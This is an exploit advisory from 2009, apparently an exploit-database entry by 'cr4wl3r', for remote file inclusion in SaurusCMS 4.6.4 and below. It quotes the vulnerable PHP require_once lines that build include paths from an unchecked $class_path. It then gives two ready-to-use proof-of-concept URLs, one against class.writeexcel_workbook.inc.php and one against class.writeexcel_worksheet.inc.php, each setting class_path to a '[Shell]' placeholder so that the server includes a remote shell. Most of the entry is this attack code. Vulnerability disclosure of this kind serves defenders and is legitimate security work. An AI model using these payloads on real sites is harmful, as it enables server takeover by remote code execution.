SaurusCMS versions 4.6.4 and below suffer from remote file inclusion vulnerabilities.
6de2ca9e4e2f957a402612f23bc31ed18fadf9b0ab78024fb3f166b5797e1ac9
##################################################################
## Exploit Title: SaurusCMS <= 4.6.4 Multiple RFI Exploit ##
## Date: 19-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://www.saurus.info ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code [class.writeexcel_workbook.inc.php]
global $class_path;
require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";
require_once $class_path."excel/class.writeexcel_format.inc.php";
//require_once "class.writeexcel_formula.inc.php";
require_once $class_path."excel/class.writeexcel_olewriter.inc.php";
~ PoC
[SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell]
~ Code [class.writeexcel_worksheet.inc.php]
global $class_path;
require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";
~ PoC
[SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]